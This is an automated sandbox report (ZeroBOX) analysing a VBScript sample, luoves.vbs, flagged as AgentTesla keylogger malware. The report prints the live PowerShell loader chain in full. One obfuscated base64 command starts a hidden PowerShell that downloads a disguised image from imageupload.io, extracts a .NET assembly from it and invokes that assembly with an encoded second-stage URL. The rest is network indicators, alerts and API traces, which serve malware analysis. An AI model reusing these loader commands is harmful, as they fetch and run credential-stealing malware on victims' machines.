popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

luoves.vbs

AgentTesla Generic Malware Antivirus KeyLogger SMTP AntiDebug AntiVM PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 24, 2023, 9:38 a.m. Oct. 24, 2023, 9:40 a.m.
Size 330.0KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 0ce3fdcbefda30517ac10b2fdf96f426
SHA256 8b2ee20f8fb8df593ae00bf56f492d20106b64bd5388389df285f9af5fa9209e
CRC32 B8EF7784
ssdeep 3072:Rx28rR4MiXWR4ZpR4ER4iR4ZcXR47XSOeeeeeHeeeeenveeeeejeeeee6xeeeeeg:BZIpt/I6Ai3
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\luoves.vbs

    2548

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('PzXsYGN','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2628

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm9hbGloc2FtLzEyMS43Mi40MTIuNTkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2768

Name Response Post-Analysis Lookup
imageupload.io
A 104.21.83.102
A 172.67.222.26
104.21.83.102
IP Address Status Action
164.124.101.2 Active Moloch
172.67.222.26 Active Moloch
95.214.27.121 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49165 -> 172.67.222.26:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 95.214.27.121:80 -> 192.168.56.101:49167 2020425 ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 Exploit Kit Activity Detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49165
172.67.222.26:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=imageupload.io 7f:d3:2d:a3:40:e0:de:64:4d:f5:a5:0f:96:b0:ae:07:58:85:a8:85

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: True
console_handle: 0x00000013
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526978
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526978
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526978
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526978
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526978
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526978
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526cf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526cf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526cf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00527278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00526578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005270b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005270b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006632d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00663cd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00663cd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00663cd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00663398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00663398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00663398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00663398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00663398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00663398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0x8d090c
0x8d086d
0x8d0700
0x8d0083
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x727a2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x727b264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x727b2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72867610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728f1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728f1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728f1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728f416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x741b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x741b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 8b 4d dc ff 15 1c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8d3bf5
registers.esp: 2092888
registers.edi: 2092912
registers.eax: 0
registers.ebp: 2092924
registers.edx: 195
registers.ebx: 41606556
registers.esi: 41635132
registers.ecx: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://95.214.27.121/mashilao.txt
suspicious_features GET method with no useragent header suspicious_request GET https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg
request GET http://95.214.27.121/mashilao.txt
request GET https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02890000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02960000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2628
stack_dep_bypass: 0
